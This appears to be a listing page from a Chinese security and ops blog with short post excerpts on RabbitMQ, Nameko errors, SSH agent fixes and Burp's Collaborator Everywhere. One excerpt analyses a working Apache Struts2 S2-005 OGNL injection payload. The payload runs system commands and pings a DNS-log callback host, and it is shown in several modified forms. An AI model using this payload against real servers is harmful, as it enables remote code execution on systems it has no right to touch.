Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

【白帽汇】内网IT资产管理工具 Goby

September 30, 2019

【白帽汇】内网IT资产管理工具 Goby

【白帽汇】内网IT资产管理工具 Goby

September 30, 2019

RabbitMQ 简易操作笔记 2

RabbitMQ 简易操作笔记 2 <!–more–> 说明 # CentOS 7 sudo yum install -y rabbitmq-server # 潜在的前端操作 rabbitmqctl add_user admin admin rabbitmqctl set_user_tags admin administrator rabbitmqctl set_permissions -p / admin ".*" ".*" ".*" # 开始 RabbitMQ Server rabbitmqctl start_app # 停止 RabbitMQ Server rabbitmqctl stop_app # 重置 RabbitMQ Server rabbitmqctl reset

September 30, 2019

Nameko Python RPC 框架

Nameko Python RPC 框架 <!–more–> 说明 报错信息 nameko crashed: [Errno 111] ECONNREFUSED /usr/lib/python2.7/dist-packages/nameko/cli/main.py:26:in main /usr/lib/python2.7/dist-packages/nameko/cli/run.py:182:in main /usr/lib/python2.7/dist-packages/nameko/cli/run.py:132:in run /usr/lib/python2.7/dist-packages/nameko/runners.py:67:in start /usr/lib/python2.7/dist-packages/nameko/utils.py:180:in spawning_method /usr/lib/python2.7/dist-packages/eventlet/greenpool.py:238:in next /usr/lib/python2.7/dist-packages/eventlet/greenthread.py:175:in wait /usr/lib/python2.7/dist-packages/eventlet/event.py:121:in wait /usr/lib/python2.7/dist-packages/eventlet/hubs/hub.py:294:in switch /usr/lib/python2.7/dist-packages/eventlet/greenthread.py:214:in main /usr/lib/python2.7/dist-packages/nameko/utils.py:175:in call /usr/lib/python2.7/dist-packages/nameko/containers.py:198:in start /usr/lib/python2.7/dist-packages/nameko/utils.py:180:in spawning_method /usr/lib/python2.7/dist-packages/eventlet/greenpool.py:238:in next /usr/lib/python2.7/dist-packages/eventlet/greenthread.py:175:in wait /usr/lib/python2.7/dist-packages/eventlet/event.py:121:in wait /usr/lib/python2.7/dist-packages/eventlet/hubs/hub.py:294:in switch /usr/lib/python2.7/dist-packages/eventlet/greenthread.py:214:in main /usr/lib/python2.7/dist-packages/nameko/utils.py:175:in call /usr/lib/python2.7/dist-packages/nameko/messaging.py:191:in setup /usr/lib/python2.7/dist-packages/nameko/amqp.py:43:in verify_amqp_uri /usr/lib/python2.7/dist-packages/kombu/transport/pyamqp.py:116:in […]

September 30, 2019

在 CentOS 7 上安装 fish

在 CentOS 7 上安装 fish <!–more–> 正文 How To Install Fish, The Friendly Interactive Shell, In Linux https://www.ostechnix.com/install-fish-friendly-interactive-shell-linux/

September 27, 2019

S2-005 pyload 调试笔记

Contents1 S2-005 payload 分析1.1 原始 payload1.2 URLDecode1.3 Unicode string escape1.4 开始修改1.5 修改状态2 S2-005 payload 分析 原始 payload (%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22))) &(asdf)((‘%5cu0023rt.exec(%22ping@-c@3@ijtrsivzwnreezte.send.jiance.qianxin.com%22.split(%22@%22))’)(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1 URLDecode (‘\u0023_memberAccess[\’allowStaticMethodAccess\’]’)(vaaa)=true&(aaaa)((‘\u0023context[\’xwork.MethodAccessor.denyMethodExecution\’]\u003d\u0023vccc’)(\u0023vccc\u003dnew java.lang.Boolean("false")))&(asdf)((‘\u0023rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))’)(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 Unicode string escape (‘#_memberAccess[\’allowStaticMethodAccess\’]’)(vaaa)=true& (aaaa)( (‘#context[\’xwork.MethodAccessor.denyMethodExecution\’]=#vccc’) (#vccc=new java.lang.Boolean("false")) )& (asdf)( (‘#rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))’) (#rt=@java.lang.Runtime@getRuntime()) )=1 开始修改 (‘\u0023_memberAccess[\’allowStaticMethodAccess\’]’)(vaaa)=true& (aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))& (aabb)( (‘#outstr.close()’) (‘#outstr.print("888888")’) (‘#outstr.println("webpath")’) (‘#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()’) ) 修改状态2 (%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(aabb)((‘\u0023outstr.close()’)(‘\u0023outstr.print("888888")’)(‘\u0023outstr.println("webpath")’)(‘\u0023outstr\u003d@org.apache.struts2.ServletActionContext@getResponse().getWriter()’))=1

September 27, 2019

【笔记】Learn Version Control with Git

【笔记】Learn Version Control with Git Learn Version Control with Git: A step-by-step course for the complete beginner

September 27, 2019

如何使用 Collaborator Everywhere

如何使用 Collaborator Everywhere <!–more–> 使用方法 https://github.com/PortSwigger/collaborator-everywhere 注意,要现在 scope 中设置范围, collaborator-everywhere 之后才会工作,且只对范围内的请求,修改/添加 HTTP 请求头。 捕获到的请求 GET /wp-content/uploads/2018/05/138-140FP91001-1024×640.jpg HTTP/1.1 Host: wp.blkstone.me User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@hvgwzou2c52d11kl8cd4nr16yx4r8fx.burpcollaborator.net Accept: image/webp,*/* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://3gkikafoxrnzmn57tyyq8dmsjjpdn1c.burpcollaborator.net/ref If-Modified-Since: Sat, 19 May 2018 09:49:59 GMT If-None-Match: "19f18-56c8bfdde1fc0" Cache-Control: no-transform X-Wap-Profile: […]

September 26, 2019

Windows cmder 配置 ssh 密钥登陆 github/gitlab

Windows cmder 配置 ssh 密钥登陆 github/gitlab <!–more–> 正文 http://romanitalian.github.io/sections/console/github_cmder/

September 26, 2019

unable to start ssh-agent service, error :1058 问题解决

Contents1 unable to start ssh-agent service, error :1058 问题解决1.1 问题场景1.2 问题解决1.3 补充 unable to start ssh-agent service, error :1058 问题解决 <!–more–> 问题场景 Windows cmder 配置 ssh 的密钥对来使用 gitlab. 参考 http://romanitalian.github.io/sections/console/github_cmder/ 在 C:\Users\%YOUR_USER_NAME%\.ssh 运行 ssh-agent -s 发现报错 unable to start ssh-agent service, error :1058 问题解决 https://github.com/lukesampson/pshazz/issues/70#issuecomment-395138084 services.msc 找到 OpenSSH Authentication Agent 服务,将其属性从 disabled 设置为 automatic 。 […]

September 25, 2019

渗透测试之业务流量通用抓包方法及自动化漏洞扫描

渗透测试之业务流量通用抓包方法及自动化漏洞扫描 <!–more–> 正文 https://mp.weixin.qq.com/s/vBo6GXQLW2Oo0nq1DVzSuw